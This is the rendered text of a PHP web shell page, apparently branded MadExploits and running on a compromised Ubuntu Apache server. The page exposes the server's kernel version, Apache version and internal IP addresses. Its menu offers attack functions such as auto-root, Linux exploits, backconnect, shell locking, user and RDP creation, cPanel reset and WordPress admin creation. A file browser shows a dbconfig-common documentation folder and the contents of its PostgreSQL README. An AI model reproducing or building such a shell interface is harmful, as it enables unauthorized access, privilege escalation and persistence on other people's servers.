Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
dbconfig-common /
[ HOME SHELL ]
Name
Size
Permission
Action
dbapp-policy.html
[ DIR ]
drwxr-xr-x
dbconfig-common.html
[ DIR ]
drwxr-xr-x
examples
[ DIR ]
drwxr-xr-x
README.Debian
37
B
-rw-r--r--
README.pgsql
1.4
KB
-rw-r--r--
THANKS
826
B
-rw-r--r--
TODO.gz
2.38
KB
-rw-r--r--
TRANSLATORS
1.26
KB
-rw-r--r--
changelog.gz
1.51
KB
-rw-r--r--
copyright
9.79
KB
-rw-r--r--
dbapp-policy.pdf.gz
79.02
KB
-rw-r--r--
dbapp-policy.ps.gz
90.83
KB
-rw-r--r--
dbapp-policy.txt.gz
2.79
KB
-rw-r--r--
dbconfig-common-design.html
4.49
KB
-rw-r--r--
dbconfig-common.pdf.gz
120.26
KB
-rw-r--r--
dbconfig-common.ps.gz
129.01
KB
-rw-r--r--
dbconfig-common.txt.gz
7.94
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README.pgsql
Helpful information for users who are using postgresql databases. AUTHENTICATION METHODS Postgres supports many types of authentication methods. dbconfig-common currently classifies them into two families: "ident", and "password". The former consists of local "peer" and remote postgresql "ident" type connections. and the latter consists of all the postgresql connections that require a password (password, crypt, md5, maybe pam/krb5). For "ident" (=peer) connections on a local host, the server will check that the owner of the local unix socket is authorized to connect to the database. For "ident" connections on a remote host, the server will use an rfc 1413 based ident connection to establish identification. This is probably a bad idea, as ident is easily spoofable in non-secured networks. For "password" connections, the psql client will send along passwords with its connection attempts to the server. The server will then pass the password to whatever authentication backends it's configured to use. Note that dbconfig-common has no control over whether or not the password is sent cleartext over the network (see USING SSL), so you should be aware of the security risks involved with network based connections. USING SSL You must also configure your server to use SSL, which is beyond the scope of this document. See: http://developer.postgresql.org/docs/postgres/ssl-tcp.html for directions on how to do that.
Close